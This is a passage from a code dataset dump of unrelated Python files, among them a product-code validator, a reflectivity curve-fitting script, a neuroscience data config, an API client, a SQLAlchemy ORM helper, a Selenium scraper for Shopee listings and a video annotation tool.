\"A1\" in a_str:\r\n #print(len(a_str), \"char in str\")\r\n for c in a_str:\r\n #print(ord(c))\r\n if ord(c) in range(65,91) or ord(c) in range(48,58):\r\n valid.append(\"True\")\r\n \r\n else:\r\n valid.append(\"False\")\r\n \r\n else:\r\n #print(\"No A1 in str\")\r\n valid.append(\"False\")\r\n else:\r\n #print(\"longueur incorrecte\")\r\n valid.append(\"False\") \r\n #print (valid) \r\n if \"False\" in valid:\r\n return False\r\n else:\r\n return True\r\n \r\n \r\n#Remember, capital letters have ordinal numbers between 65\r\n#(\"A\") and 90 (\"Z\"). You may use the ord() function to get\r\n#a letter's ordinal number.\r\n\r\n#Below are some lines of code that will test your function.\r\n#You can change the value of the variable(s) to test your\r\n#function with different inputs.\r\n#\r\n#If your function works correctly, this will originally\r\n#print: True, True, False, False, False\r\nprint(valid_product_code(\"A12B44BP\"))\r\nprint(valid_product_code(\"BFDSAUSA98932RWEFOEWA9FEAA1DSFSF\"))\r\nprint(valid_product_code(\"A1BBD5\"))\r\nprint(valid_product_code(\"BDD5664S\"))\r\nprint(valid_product_code(\"66aBSaA1fdsv\"))\r\nprint(valid_product_code(\"BFDSAUSA98932RWEFOEWA9FEAA1DSFSF\"))\r\n","sub_path":"Valide product code.py","file_name":"Valide product code.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"411150138","text":"from numpy import sqrt, square, divide, inf\nfrom scipy.optimize import curve_fit\n\ndef s1_2(q_R,c1_2):\n return c1_2*q_R[0] # q\n\ndef t(q_R, c3, c4):\n return c3 + c4*square(q_R[0]) # q\n\ndef Rs(q_R): #simulated reflectivity\n return q_R[1] # R\n\ndef nb(q_R, i, c1_2, c3, c4, c5):\n return (i*c5*\n t(q_R, c3, c4)*\n square(s1_2(q_R,c1_2)))\n\ndef ns(q_R, i, c1_2, c3, c4):\n return i*( Rs(q_R)*\n t(q_R, c3, c4)*\n square(s1_2(q_R,c1_2)) )\n\ndef func_dR_R1(q_R, i, c1_2, c3, c4, c5):\n out = divide( sqrt(q_R[1]+2*c5),\n Rs(q_R)*sqrt(i*t(q_R, c3, c4)*\n square( s1_2(q_R,c1_2) )) )\n return out\n\ndef func_dR_R2(q_R, i, c1_2, c3, c4, c5):\n return ( sqrt( ns(q_R, i, c1_2, c3, c4)+\n 2*nb(q_R, i, c1_2, c3, c4, c5) ) /\n ns(q_R, i, c1_2, c3, c4) )\n\ndef dR_R_func(q_R, i, c1_2, c3, c4, c5): # difrent\n return divide( sqrt(ns(q_R, i, c1_2, c3, c4)+\n 2*c5),\n ns(q_R, i, c1_2, c3, c4) )\n\n# def dR_R_func2(q_R, i, c1_2, c3, c4, c5): # difrent\n# return divide( sqrt(ns(q_R, i, c1_2, c3, c4)+\n# 2*c5),\n# ns(q_R, i, c1_2, c3, c4) )\n\ndef func_(q_R, i, c1_2, c3, c4, c5):\n pass\n\ndef main(sim_q=None, sim_R=None, sim_dR=None, file=\"SimDataBase_29553_54.dat\"):\n # 29553_54.dat\n func = func_dR_R2\n# file = \"29553_54.dat\"\n import data_in\n data = data_in.data_in(file)\n q = data[0]\n R = data[1]\n dR = data[2]\n q_R = [q,R]\n if sim_q is None:\n sim_q = q\n if sim_R is None:\n sim_R = R\n if sim_dR is None:\n sim_dR = dR\n #[i, c1_2, c3, c4, c5]\n bounds = (0,inf)#[(0,inf),(0,inf),(0,inf),(0,inf),(0,inf)]# \n dR_R = divide(dR, R)\n out_opt, out_covar = curve_fit(func, q_R, dR_R,bounds=bounds)\n print(\"out \",out_opt,\"\\nvar: \", out_covar)\n sim_dR_R = func([sim_q, sim_R], *out_opt)\n #print(q,R,dR)\n return sim_dR_R*sim_R\n\n\n\nclass tester:\n def __init__(self,ins=False,q=[],R=[],dR=[], cs=[]):\n import numpy as np\n if not ins:\n q = [1.,2.,3.,4.]\n R = [2*x for x in q]\n dR = [x/2 for x in q]\n cs = [1.5,2.5,3.5,4.5,5.5]\n self.q = np.array(q)\n #self.q = []\n self.R = np.array(R)\n self.q_R = np.array([q,R])\n self.dR = np.array(dR)\n self.cs = np.array(cs)\n \n def __call__(self, func=None):\n q_R, i, c1_2, c3, c4, c5 = self.q_R, self.cs[0], self.cs[1], self.cs[2], self.cs[3], self.cs[4]\n if func is None:\n func = [self.s1_2, self.t, self.Rs, self.nb, self.ns, self.func_dR_Rs]\n if not hasattr(func, '__iter__'):\n #q_R, c1_2, c3, c4, c5\n func = [func]\n outs = [f(q_R, i, c1_2, c3, c4, c5) for f in func]\n print(outs)\n self.printout(outs)\n\n def printout(self,outs):\n if hasattr(outs, '__iter__'):\n outs = all(outs)\n print(\"results: \", outs)\n \n def s1_2(self, q_R, i, c1_2, c3, c4, c5):\n reqs = [c1_2*x==s for x,s in zip(self.q,s1_2(q_R, c1_2))]\n return all(reqs)\n\n def t(self, q_R, i, c1_2, c3, c4, c5):\n outs = [(c3+c4*(x**2))==ts for x,ts in zip(self.q,t(q_R, c3, c4))]\n return all(outs)\n\n def Rs(self, q_R, i, c1_2, c3, c4, c5):\n outs = [x==r for x,r in zip(Rs(q_R),self.R)]\n return all(outs)\n\n def nb(self, q_R, i, c1_2, c3, c4, c5):\n outs = [i*c5*( (c3+c4*(x**2))*\n ((c1_2*x)**2) )==n for x,n in zip(self.q,\n nb(q_R, i, c1_2, c3, c4, c5))]\n return all(outs)\n \n def ns(self, q_R, i, c1_2, c3, c4, c5):\n comp = [i*rs*( (c3+c4*(x**2))*\n ((c1_2*x)**2) ) for x,rs in zip(self.q,self.R)]\n outs = [x==n for x,n in zip(comp,\n ns(q_R, i, c1_2, c3, c4))]\n return all(outs)\n \n def func_dR_Rs(self, q_R, i, c1_2, c3, c4, c5):\n result1 = [self.aprox_equal(out1,out2) for out1,out2 in zip( func_dR_R1(q_R, i, c1_2, c3, c4, c5),\n func_dR_R2(q_R, i, c1_2, c3, c4, c5) )]\n result2 = [out1==out2 for out1,out2 in zip( func_dR_R1(q_R, i, c1_2, c3, c4, c5), # will not be equal\n dR_R_func(q_R, i, c1_2, c3, c4, c5) )]\n result3 = [out1==out2 for out1,out2 in zip( func_dR_R2(q_R, i, c1_2, c3, c4, c5), # will not be equal\n dR_R_func(q_R, i, c1_2, c3, c4, c5) )]\n print(result1)\n return ( all(result1) and# all(result2), all(result3),\n self.nb(q_R, i, c1_2, c3, c4, c5) and\n self.ns(q_R, i, c1_2, c3, c4, c5) )\n\n def aprox_equal(self,one,two,aprox=0.00005):\n return two<=one+aprox and two >=one-aprox\n\n\nif __name__ == '__main__':\n if False:\n import numpy as np\n a = np.linspace(1,5,num=5) # 1,2,3,4,5\n b = np.linspace(6,10,num=5) # 6,7,8,9,10\n c = np.array([a,b]) # [1,2,3,4,5],[6,7,8,9,10]\n d = np.transpose(c)# [1,6],[2,7],[3,8],[4,9],[5,10]\n print(a,b,c,c[1],c[1,:],d, d[1,:]) #c[1], c[1,:] = [6,7,8,9,10]\n file = \"29553_54.dat\"\n import data_in\n data = data_in.data_in(file)\n print(data[0],data[:,0])\n elif True:\n print(\"testing...\")\n test = tester()\n test()\n else:\n main()\n \n ","sub_path":"make_sim_data.py","file_name":"make_sim_data.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"485233706","text":"# Config\nimport os\nimport socket\n\n\nclass Allen_Brain_Observatory_Config():\n \"\"\"Config for rebuilding Allen data in a database.\"\"\"\n def get_host_path(self):\n if socket.gethostname() == 'x8':\n self.host = 'x8'\n self.repo_PATH = '/home/drew/Documents/abo_data'\n self.cc_path = '/home/drew/Documents/contextual_circuit_bp'\n elif socket.gethostname() == 'x9':\n self.host = 'x9'\n self.repo_PATH = '/home/drew/Documents/abo_data'\n self.cc_path = '/home/drew/Documents/contextual_circuit_bp'\n self.cluster_cc_path = '/media/data_cifs/cluster_projects/contextual_circuit_bp'\n else:\n raise Exception(\n 'Unknown Host : Please add your directory at get_host_path()')\n\n def __init__(self, **kwargs):\n self._id = ''\n \"\"\" Directories\"\"\"\n self.get_host_path()\n self.log_dir = 'logs'\n self.DB_loc = 'DataForTrain'\n self.exp_method_template_dir = 'CCBP_experiment_templates'\n self.exp_data_template_dir = 'CCBP_dataset_templates'\n self.cc_template = os.path.join(\n self.exp_data_template_dir,\n 'template_cc_model.txt')\n self.tmp_pachaya_folder = 'pachaya_scripts' # Holding old files here\n self.data_loc = os.path.join(\n '%smedia' % os.path.sep,\n 'data_cifs',\n 'AllenData')\n self.tf_record_output = os.path.join(\n '%smedia' % os.path.sep,\n 'data_cifs',\n 'contextual_circuit',\n 'tf_records')\n self.ccbp_exp_evals = os.path.join(\n '%smedia' % os.path.sep,\n 'data_cifs',\n 'contextual_circuit',\n 'experiment_evaluations')\n self.deconv_model_dir = os.path.join(\n self.data_loc,\n 'deconv_models')\n self.model_struct_dir = os.path.join(\n self.cc_path,\n 'models',\n 'structs')\n self.model_template_dir = os.path.join(\n self.model_struct_dir,\n 'template_ALLEN')\n self.model_prefix = 'auto_generated_'\n\n # TODO: Document these parameters\n # Parameters\n self.rf_shuffles = 5000\n self.alpha = 0.5\n self.FILTERS = True\n self.filters_file = os.path.join( # None if no filters\n self.repo_PATH,\n 'filters_VISp_175_sigNS_nonzeroNM_reliableRF.pkl')\n self.data_set_code = 'Area-VISp_Depth-175um_NS-sig_NMall-nonzero_LSN-rfChi2-0.05_allStim-true'\n self.cells_pkl = 'all_cells_RF_info_08_30_17.pkl'\n\n # Order for Name Code\n # Area / depth / Stimuli - SG, DG, NS, NM, LSN / aShow only\n # data with results from all stimuli allStim = True\n self.RESHAPE_IMG_NS = True\n self.reshape_img_size_h = 31\n self.reshape_img_size_w = 31\n self.save_folder = 'DataForTrain/'\n self.db_ssh_forward = False\n\n # Template for cc_bp repo data loading\n self.multi_exps = 'multi_cell_exps'\n self.cc_data_dir = os.path.join(\n self.cc_path,\n 'dataset_processing')\n self.manifest_file = os.path.join(\n self.data_loc,\n 'boc/manifest.json')\n self.all_exps_csv = os.path.join(\n self.tmp_pachaya_folder,\n 'all_exps.csv')\n self.stimulus_template_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'all_stimulus_template')\n self.RF_info_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'all_RFs_info')\n self.imaging_response_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'all_imaging_responses')\n self.fluoresence_type = 'dff_traces_loc' # 'fluorescence_traces'\n self.fluorescence_traces_loc = os.path.join(\n self.imaging_response_loc,\n self.fluoresence_type)\n self.ROIs_mask_loc = os.path.join(\n self.imaging_response_loc,\n 'ROIs_mask')\n self.stim_table_loc = os.path.join(\n self.imaging_response_loc,\n 'stim_tables')\n self.specimen_recording_loc = os.path.join(\n self.imaging_response_loc,\n 'specimen_recording')\n self.output_pointer_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'output_pointers')\n self.Allen_analysed_stimulus_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'Allen_stimulus_analysis',\n 'By_cell_ID')\n self.precal_matrix_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'Allen_stimulus_analysis',\n 'By_container_ID')\n\n # Brain Observatory project information\n self.stim = {\n 'DG': 'drifting_gratings',\n 'LSN': 'locally_sparse_noise',\n 'LSN4': 'locally_sparse_noise_4deg',\n 'LSN8': 'locally_sparse_noise_8deg',\n 'NM1': 'natural_movie_one',\n 'NM2': 'natural_movie_two',\n 'NM3': 'natural_movie_three',\n 'NS': 'natural_scenes',\n 'Spon': 'spontaneous',\n 'SG': 'static_gratings'\n }\n self.session = {\n 'A': u'three_session_A',\n 'B': u'three_session_B',\n 'C': u'three_session_C',\n 'C2': u'three_session_C2'\n }\n self.sess_with_number = {\n 'locally_sparse_noise_4deg': 'locally_sparse_noise_four_deg',\n 'locally_sparse_noise_8deg': 'locally_sparse_noise_eight_deg'}\n self.session_RF_stim = {\n 'C': ['locally_sparse_noise'],\n 'C2': [\n 'locally_sparse_noise_4deg',\n 'locally_sparse_noise_8deg'\n ],\n }\n self.session_name_for_RF = [\n 'locally_sparse_noise',\n 'locally_sparse_noise_4deg',\n 'locally_sparse_noise_8deg'\n ]\n self.LSN_size_in_deg = {\n 'height': 74.4,\n 'width': 130.2\n }\n self.RF_sign = ['on', 'off']\n self.pick_main_RF = [\n 'locally_sparse_noise',\n 'locally_sparse_noise_8deg'\n ]\n self.available_stims = [\n 'locally_sparse_noise',\n 'locally_sparse_noise_4deg',\n 'locally_sparse_noise_8deg',\n 'natural_movie_one',\n 'natural_movie_three',\n 'natural_movie_two',\n 'natural_scenes'\n ]\n","sub_path":"allen_config.py","file_name":"allen_config.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216084347","text":"# -*- coding: utf-8 -*-\nfrom .auth import Auth\nfrom .model import DeskmatePlanModel as DeskmatePlanModelBase, DeskmateModel\n\n\nclass DeskmatePlanModel(DeskmatePlanModelBase):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def deskmate_profile(self):\n for up in self.user_profile:\n if up.user.shanbay_id != self.shanbay_id:\n return up\n\n def my_profile(self):\n for up in self.user_profile:\n if up.user.shanbay_id == self.shanbay_id:\n return up\n\n def deskmate_days(self):\n return max(cd.user_checkin_days for cd in self.checkin_data)\n\n\nclass DeskmatePlanList(list):\n def __init__(self, deskmate_plans):\n super().__init__(deskmate_plans)\n\n def current_deskmate(self):\n if self and self[0].status == self[0].__class__.DOING:\n return self[0].deskmate_profile()\n\n def current_deskmate_days(self):\n if self and self[0].status == self[0].__class__.DOING:\n return self[0].deskmate_days()\n\n def successful_plans(self):\n scfp = __class__([])\n for dp in self:\n if dp.status == dp.__class__.SUCCESS:\n scfp.append(dp)\n return scfp\n\n def deskmates(self, nrdt=False):\n \"\"\"\n 历史同桌\n :param nrdt: 是否去重\n :return:\n \"\"\"\n ds = []\n sids = []\n for dp in self:\n if nrdt:\n if dp.deskmate_profile().user.shanbay_id not in sids:\n sids.append(dp.deskmate_profile().user.shanbay_id)\n ds.append(dp.deskmate_profile())\n else:\n ds.append(dp.deskmate_profile())\n return ds\n\n\nclass Deskmate(Auth):\n def __init__(self, shanbay_id=None, user_id=None):\n assert shanbay_id is not None or user_id is not None\n self.shanbay_id = shanbay_id\n self.user_id = user_id\n\n def user_info(self):\n url = 'https://www.shanbay.com/api/v2/deskmate/userinfos/'\n params = {'user_id': self.shanbay_id or self.user_id}\n j = __class__.request.get(url, params=params).json()\n return DeskmateModel(**j['data'])\n\n def fetch_deskmate_plans(self, page=1, ipp=50):\n url = 'https://www.shanbay.com/api/v2/deskmate/userdeskmateplans/'\n params = {\n 'user_id': self.shanbay_id or self.user_id,\n 'page': page,\n 'ipp': ipp\n }\n return __class__.request.get(url, params=params).json()\n\n def ideskmate_plan(self, ipp=50):\n page = 0\n while True:\n page += 1\n _json = self.fetch_deskmate_plans(page, ipp)\n for dp in _json['data']['objects']:\n yield DeskmatePlanModel(**dp)\n if _json['data']['total'] <= page * ipp:\n break\n\n def deskmate_plans(self, ipp=50):\n dps = DeskmatePlanList([])\n for dp in self.ideskmate_plan(ipp):\n dps.append(dp)\n return dps\n","sub_path":"bin/shanbay/deskmate.py","file_name":"deskmate.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"21242298","text":"import gensim\nimport torch\nfrom torch import nn\nfrom os.path import basename\nfrom library.utils.datasets.dictionary import START, END\n\n\ndef make_embedding(id2word, w2v_file, initializer=None):\n \"\"\"\n 嵌入层转换,id -> vec\n oov 返回\n \"\"\"\n attrs = basename(w2v_file).split('.') # word2vec.{dim}d.{vsize}k.bin\n w2v = gensim.models.Word2Vec.load(w2v_file).wv\n vocab_size = len(id2word)\n emb_dim = int(attrs[-3][:-1])\n embedding = nn.Embedding(vocab_size, emb_dim).weight\n if initializer is not None:\n initializer(embedding)\n\n oovs = []\n with torch.no_grad():\n for i in range(len(id2word)):\n # NOTE: id2word can be list or dict\n if i == START:\n embedding[i, :] = torch.Tensor(w2v['<s>'])\n elif i == END:\n embedding[i, :] = torch.Tensor(w2v[r'<\\s>'])\n elif id2word[i] in w2v:\n embedding[i, :] = torch.Tensor(w2v[id2word[i]])\n else:\n oovs.append(i)\n return embedding, oovs","sub_path":"src/library/text/modules/base/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"309767800","text":"import logging\nimport traceback\nfrom datetime import datetime, timedelta\n\nfrom sqlalchemy import Column, BigInteger, create_engine, DateTime, func, Integer\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy.sql import text\nfrom sqlalchemy.orm import sessionmaker, scoped_session, Query\nfrom sqlalchemy.orm.exc import ObjectDeletedError\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.ext.hybrid import hybrid_method\nfrom flask import _app_ctx_stack\nlogger = logging.getLogger(__name__)\n\n\nclass CustomQuery(Query):\n\n def chunked_all(self, count, commit=False,\n skip_errors=False, expunge_all=True):\n \"\"\"Bring objects in chunks from database.\n\n :param count: chunk size\n :param commit: commit session after fetching each chunk.\n :param skip_errors: if commit() raises error, skip them.\n :param expunge_all: expunge object after yielding it. This is\n required for objects to be removed session after each iteration.\n If False, objects will remain in session and be sent\n back and forth between client and database that will\n eventually cause slowdown.\n\n \"\"\"\n if skip_errors:\n assert commit\n\n last_id = 0\n while True:\n logger.debug('last_id: %s' % last_id)\n query = self.filter('id>%s' % last_id).order_by(\"id asc\")\n objects = query.limit(count).all()\n if not objects:\n break\n\n for object in objects:\n try:\n last_id = object.id\n except ObjectDeletedError:\n self.session.rollback()\n last_id += 1\n else:\n yield object\n\n if commit:\n if skip_errors:\n try:\n self.session.commit()\n except:\n self.session.rollback()\n logger.warning(traceback.format_exc())\n else:\n self.session.commit()\n\n if expunge_all:\n self.session.expunge_all()\n\n#uri = 'mysql://%s:%s@%s/%s?charset=utf8&use_unicode=1' % (\n# config.MYSQL_USER,\n# config.MYSQL_PASSWD,\n# config.MYSQL_HOST,\n# config.MYSQL_DB)\n\nuri = 'sqlite:///test.db'\n\nengine = create_engine(uri, echo=False)\nSession = sessionmaker(\n bind=engine,\n query_cls=CustomQuery,\n autoflush=True, # herhangi bir query yapmadan once flush yapar\n autocommit=False, # True cok tehlikeli\n expire_on_commit=True) # commit yapildiktan sonra objenin attribute'lerini expire eder. erisim olursa select yapip tekrar ceker.\nsession = scoped_session(Session, scopefunc=_app_ctx_stack.__ident_func__)\n\n\ndef _get_date():\n return datetime.utcnow()\n\n\nclass TimestampMixin(object):\n\n created_at = Column(DateTime, default=_get_date)\n updated_at = Column(DateTime, default=_get_date, onupdate=_get_date)\n\n def touch(self):\n self.update({'updated_at': _get_date()})\n \n @hybrid_method\n def is_stuck(self, mins=10):\n \"\"\"Is the record has not been updated in last 'mins' minutes?\"\"\"\n if not self.updated_at:\n return True\n diff = datetime.utcnow() - self.updated_at\n return diff > timedelta(minutes=mins)\n\n @is_stuck.expression\n def is_stuck(self, mins=10):\n diff = func.timestampdiff(text('minute'),\n self.updated_at, func.utc_timestamp())\n return (self.updated_at == None) | (diff > mins)\n\n\nclass Base(object):\n __table_args__ = {'mysql_engine': 'InnoDB', 'sqlite_autoincrement': True}\n \n id = Column(Integer, primary_key=True)\n\n # default session is scoped session\n query = session.query_property()\n\n @property\n def session(self):\n \"\"\"Return this object's session\"\"\"\n return Session.object_session(self)\n\n def __repr__(self):\n try:\n id = self.id\n except SQLAlchemyError:\n id = 'Unknown'\n\n return '<%s id=%r>' % (self.__class__.__name__, id)\n \n @classmethod\n def count(cls, expr=None):\n q = session.query(func.count('*'))\n if expr is not None:\n q = q.filter(expr)\n return q.scalar() or 0\n\n @classmethod\n def get(cls, id):\n \"\"\"Shortcut for Model.query.get()\"\"\"\n return cls.query.get(id)\n \n def save(self, commit=True):\n session.add(self)\n if commit:\n session.commit()\n \n def update(self, update_dict, commit=True, where=None, _session=None):\n if update_dict:\n __session = _session if _session else session\n\n # id olmadan update gonderince sacmalamasin\n if not self.id:\n __session.add(self)\n __session.flush()\n\n cls = self.__class__\n \n query = __session.query(cls).filter(cls.id == self.id)\n \n if where:\n query = query.filter_by(**where)\n\n query.update(update_dict)\n\n __session.add(self)\n if commit:\n __session.commit()\n \n def delete(self, commit=True):\n session.delete(self)\n if commit:\n session.commit()\n \n def to_dict(self, *fields):\n '''Returns model as dict. If fields is given, returns only given fields.\n If you want to change the field name in returned dict,\n give a tuple like ('real_field_name', 'wanted_field_name') instead of str.'''\n d = {}\n keys = self.__table__.columns.keys()\n if fields:\n keys = fields\n \n for columnName in keys:\n if isinstance(columnName, tuple):\n d[columnName[1]] = getattr(self, columnName[0])\n else:\n d[columnName] = getattr(self, columnName)\n return d\n \n def from_dict(self, d):\n for columnName in d.keys():\n setattr(self, columnName, d[columnName])\n\nBase = declarative_base(bind=engine, cls=Base)\n","sub_path":"orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"590344208","text":"import time, os, shutil\r\nfrom datetime import date\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import TimeoutException\r\n# from phantomjs import Phantom\r\nfrom selenium.webdriver.chrome.options import Options \r\n\r\nchrome_options = Options() \r\nchrome_options.add_argument(\"--headless\")\r\nchrome_options.add_argument(\"--disable-web-security\")\r\nchrome_options.add_argument(\"--start-maximized\")\r\nchrome_options.add_argument(\"--allow-running-insecure-content\")\r\nchrome_options.add_argument(\"test-type\")\r\n\r\nclass crawlEngine():\r\n def __init__(self):\r\n self = self\r\n # self.driver = webdriver.PhantomJS(\"D:/Bifm/phantomjs.exe\",service_args=[\"--load-images=no\"])\r\n # self.driver = webdriver.PhantomJS(\"D:/Bifm/phantomjs.exe\")\r\n self.driver = webdriver.Chrome(executable_path=os.path.abspath(\"D:/Bifm/chromedriver.exe\"), options=chrome_options)\r\n self.driver.set_window_size(1920, 5000) # optional\r\n # Return page\r\n def returnPage(self,url):\r\n try:\r\n self.driver.get(url)\r\n self.waitLoadItems()\r\n self.waitLoadLastItems()\r\n self.pullJquery()\r\n except TimeoutException:\r\n self.returnPage(url)\r\n # Return page\r\n def waitLoadItems(self):\r\n driverLoad = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'shopee-search-item-result__item')))\r\n # Return page\r\n def waitLoadLastItems(self):\r\n # lastUrlNum = self.driver.execute_script('return $(\".shopee-search-item-result__item\").length;')\r\n lastUrlNum = self.driver.execute_script('return document.getElementsByClassName(\"shopee-search-item-result__item\").length;')\r\n lastUrlPath = \".shopee-search-item-result__item:nth-child({}) a[data-sqe=link] > div > div:first-child > img[src]\".format(lastUrlNum)\r\n driverLoad = WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CSS_SELECTOR, lastUrlPath)))\r\n # Pull Jquery from CDN\r\n def pullJquery(self):\r\n self.driver.execute_script(\"\"\"var jquery_script = document.createElement('script'); \r\n jquery_script.src = 'https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';\r\n document.getElementsByTagName('head')[0].appendChild(jquery_script);\"\"\")\r\n # time to load jQuery library\r\n time.sleep(1)\r\n # Define global variable Jquery - $\r\n self.driver.execute_script('$ = window.jQuery;')\r\n # Screenshoot page\r\n def pullImage(self,name):\r\n path = \"D:/Bifm/test/images/\"\r\n if ( os.path.exists(path + name) == False ):\r\n os.mkdir(path + name)\r\n self.driver.save_screenshot( path + name + '/result_{}.png'.format(int(time.time())))\r\n def pullItemImages(self,items):\r\n today = date.today()\r\n path = \"D:/Bifm/Bigdata/imageItem/\" + str(today)\r\n if ( os.path.exists(path) == False ):\r\n os.mkdir(path)\r\n # else:\r\n # # shutil.rmtree(path)\r\n newItems = items\r\n for j,item in enumerate(items):\r\n if 0 <= j <= 2:\r\n driver = webdriver.PhantomJS(\"D:/Bifm/phantomjs.exe\",service_args=[\"--load-images=no\"])\r\n # driver.set_window_size(1920, 1080)\r\n driver.get(item['image'])\r\n # driver.get_screenshot_as_file( path + \"/\" + file )\r\n driver.save_screenshot( path + '/bifm_{}.png'.format(int(time.time())) )\r\n file = \"bifm_{}.png\".format(int(time.time()))\r\n newItems[j][\"image\"] = file\r\n driver.close()\r\n driver.quit()\r\n else: break\r\n return newItems\r\n # Define function checkLastPage\r\n def checkLastPage(self):\r\n try:\r\n # Check if current page is last page\r\n isLPage = self.driver.execute_script('''\r\n function checkLastPage(){\r\n if ( $(\".shopee-page-controller .shopee-button-solid--primary\").next().hasClass(\"shopee-icon-button--right\") ){\r\n return true;\r\n }\r\n return false;\r\n }\r\n return checkLastPage();''')\r\n return isLPage\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Define function collectItems\r\n def collectItems(self,name):\r\n today = str(date.today())\r\n try:\r\n # Assign data crawl from json to arr_items\r\n items = self.driver.execute_script('''var arr_item = [];\r\n function collectItems(){\r\n for(var i = 0; i < $(\"div[data-sqe=name]\").length; i++){\r\n var item = {\r\n title: $(\"div[data-sqe=name] > div:first-child\").eq(i).text(),\r\n price: $(\"div[data-sqe=name]\").eq(i).next().find(\"div\").text(),\r\n image: $(\"a[data-sqe=link]\").eq(i).find(\"div > div:first-child > img\").attr(\"src\"),\r\n datecol: \"'''+today+'''\",\r\n name: \"'''+name+'''\"\r\n }\r\n arr_item.push(item);\r\n }\r\n return arr_item;\r\n }\r\n return collectItems();''')\r\n return items\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Define function clickButtonNext\r\n def clickButtonNext(self):\r\n try:\r\n self.driver.find_element_by_css_selector(\".shopee-icon-button--right\").click()\r\n return \"Crawl_success\"\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Define function clickButtonNext\r\n def clickItems(self):\r\n try:\r\n item = self.driver.find_elements_by_css_selector(\".shopee-search-item-result__item\")[1].find_element_by_tag_name(\"a\")\r\n print(item.get_attribute('innerHTML'))\r\n item.click()\r\n return \"Crawl_success\"\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Clear images\r\n def clearImage(self):\r\n path = \"D:/Bifm/test/images/\"\r\n shutil.rmtree(path)\r\n os.mkdir(path)\r\n # Close browser\r\n def closeEngine(self):\r\n self.driver.close()","sub_path":"HttpServer/controller/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"238641819","text":"import imutils\r\nimport time\r\nimport cv2\r\nimport sys\r\nimport argparse\r\nimport numpy as np\r\nimport tkinter as tk\r\nfrom tkinter import simpledialog\r\n\r\n\r\nclass TrackerObject(object):\r\n def __init__(self, name, startFrame, id):\r\n self.category = name\r\n self.startFrame = startFrame\r\n self.id = id\r\n self.endFrame = None\r\n\r\n def endTrack(self, endFrame):\r\n self.endFrame = endFrame\r\n\r\n def __repr__(self):\r\n if len(self.category) > 6:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n else:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n\r\n def __str__(self):\r\n if len(self.category) > 4:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n else:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n\r\n\r\nclass Annotation(TrackerObject):\r\n def __init__(self):\r\n # Dictionary which contains IDs as keys and Categories as Values\r\n self.objects = {}\r\n self.extract = False\r\n self.selected_ROI = False\r\n self.image_coordinates = []\r\n self.images = {}\r\n\r\n def parse_arguments(self):\r\n parser = argparse.ArgumentParser(description='Annotate a video.')\r\n parser.add_argument('-v', metavar='video', help='Path to input video file', required=True)\r\n parser.add_argument('--delay', type=int, default=0.1, help='Delaying time between frames (default : 0.1)')\r\n parser.add_argument('--scale', type=int, default=3, help='Screen scale resolution divided (default : 3)')\r\n parser.add_argument('--marking', type=bool, default=False, help='Marks bounding box to remember its id (default : False)')\r\n\r\n args = parser.parse_args()\r\n return args.v, args.delay, args.scale, args.marking\r\n\r\n def check_object(self, name):\r\n lista = []\r\n for key, value in self.objects.items():\r\n if (value.category == name) and (value.endFrame is None):\r\n lista.append(key)\r\n return lista\r\n\r\n def write_detection(self, file_name, configurations, formatter=\"x+\"):\r\n try:\r\n f = open('frame_annotations/' + file_name, formatter)\r\n f.write(configurations)\r\n except:\r\n if (formatter == \"x+\"):\r\n print(\"File was already created. We will overwrite it's content\")\r\n self.write_detection(file_name, configurations, \"w\")\r\n else:\r\n print(\"Error: name of file can not be neither created nor\")\r\n\r\n def rotate_image(self, image, angle):\r\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\r\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 0.5)\r\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], 